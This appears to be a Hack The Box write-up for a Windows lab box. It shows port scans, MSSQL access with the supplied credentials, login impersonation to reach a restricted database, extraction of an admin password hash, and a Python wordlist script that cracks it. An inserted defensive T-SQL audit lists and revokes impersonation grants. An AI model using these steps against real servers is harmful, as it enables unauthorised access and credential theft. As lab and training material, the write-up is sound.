Hack The Box - Eighteen Writeup

Box Name: Eighteen
Difficulty: Easy
OS: Windows Server 2025
Release Date: November 2025


Reconnaissance

Initial Credentials

The box provides initial credentials:

  • Username: kevin
  • Password: iNa2we6haRj2gaw!

Port Scanning

# Initial scan
nmap -p- -T4 --min-rate 1000 <TARGET_IP>

# Service enumeration
nmap -p 80,1433 -sCV <TARGET_IP>

Open Ports:

  • 80/tcp - Microsoft IIS 10.0 (HTTP)
  • 1433/tcp - Microsoft SQL Server 2022

Key Findings:

  • Domain: eighteen.htb
  • Hostname: DC01.eighteen.htb
  • This is a Domain Controller

Add to /etc/hosts

echo "<TARGET_IP> eighteen.htb dc01.eighteen.htb" | sudo tee -a /etc/hosts

Initial Access

MSSQL Enumeration

Attempt 1: SQL Authentication (Guest Access)

impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@<TARGET_IP>'

Result: Connected as guest with limited privileges.

Enumerate Logins

-- Check current user
SELECT SYSTEM_USER, USER_NAME();

-- List databases
SELECT name FROM master.dbo.sysdatabases;

Databases Found:

  • master
  • tempdb
  • model
  • msdb
  • financial_planner (custom database - access denied)

Discover Impersonation Rights

Using the enum_impersonate command in the impacket-mssqlclient shell.

Key Finding: Kevin can IMPERSONATE the appdev login!
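
The defender's view of the same finding, as an added example that is not part of the original writeup: a T-SQL audit, run as a sysadmin, that lists which logins may impersonate which. The login names kevin and appdev come from the writeup; the rest uses standard SQL Server catalog views.

```sql
-- Added example: audit server-level impersonation rights.
USE master;

-- 1) Explicit IMPERSONATE grants on individual logins.
--    A grant whose target is a sysadmin is equivalent to granting sysadmin.
SELECT
    grantee.name      AS grantee_login,
    grantee.type_desc AS grantee_type,
    target.name       AS impersonated_login,
    perm.state_desc   AS grant_state,
    grantor.name      AS granted_by,
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS perm
JOIN sys.server_principals AS grantee
    ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals AS target
    ON target.principal_id = perm.major_id
JOIN sys.server_principals AS grantor
    ON grantor.principal_id = perm.grantor_principal_id
WHERE perm.permission_name = 'IMPERSONATE'
  AND perm.class_desc = 'SERVER_PRINCIPAL'
  AND perm.state_desc IN ('GRANT', 'GRANT_WITH_GRANT_OPTION')
ORDER BY target_is_sysadmin DESC, grantee.name;

-- 2) Logins holding the blanket IMPERSONATE ANY LOGIN permission.
SELECT grantee.name AS grantee_login, perm.state_desc AS grant_state
FROM sys.server_permissions AS perm
JOIN sys.server_principals AS grantee
    ON grantee.principal_id = perm.grantee_principal_id
WHERE perm.permission_name = 'IMPERSONATE ANY LOGIN'
  AND perm.state_desc IN ('GRANT', 'GRANT_WITH_GRANT_OPTION');

-- 3) Remove the grant found on this box once it is confirmed unnecessary.
REVOKE IMPERSONATE ON LOGIN::appdev FROM kevin;
```

Any row in the first result whose grantee is a low-privilege application or user login deserves review, since EXECUTE AS LOGIN gives that grantee every permission the target holds.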

Impersonate appdev and Access Database

-- Impersonate appdev
EXECUTE AS LOGIN = 'appdev';

-- Verify
SELECT SYSTEM_USER, USER_NAME();

-- Access financial_planner database
USE financial_planner;

-- List tables
SELECT name FROM sys.tables;

Tables Found:

  • users
  • incomes
  • expenses
  • allocations
  • analytics
  • visits

Extract User Credentials

SELECT * FROM users;

Found Admin Hash:

  • Username: admin
  • Email: [email protected]
  • Hash: pbkdf2:sha256:600000$<REDACTED_SALT>$<REDACTED_HASH>

Crack the Password Hash

Created a Python script to crack the Flask PBKDF2 hash:

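#!/usr/bin/env python3
import hashlib
from multiprocessing import Pool, cpu_count

def check_password(args):
    # Werkzeug format: the salt string's UTF-8 bytes are the PBKDF2 salt
    # and the stored digest is hex-encoded.
    password, salt, iterations, target_hash = args
    computed = hashlib.pbkdf2_hmac('sha256', password, salt.encode('utf-8'), iterations)
    if computed.hex() == target_hash:
        return password.decode('utf-8', errors='ignore')
    return None

def candidates(path, salt, iterations, target_hash):
    # rockyou.txt is not valid UTF-8 throughout, so read raw bytes.
    with open(path, 'rb') as f:
        for line in f:
            word = line.rstrip(b'\r\n')
            if word:
                yield (word, salt, iterations, target_hash)

if __name__ == '__main__':
    # Hash components
    salt = "<REDACTED_SALT>"
    iterations = 600000
    target_hash = "<REDACTED_HASH>"

    # Run against rockyou.txt with multiprocessing
    with Pool(cpu_count()) as pool:
        jobs = candidates('rockyou.txt', salt, iterations, target_hash)
        for result in pool.imap_unordered(check_password, jobs, chunksize=64):
            if result:
                print(f"Cracked Password: {result}")
                break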

Cracked Password: iloveyou1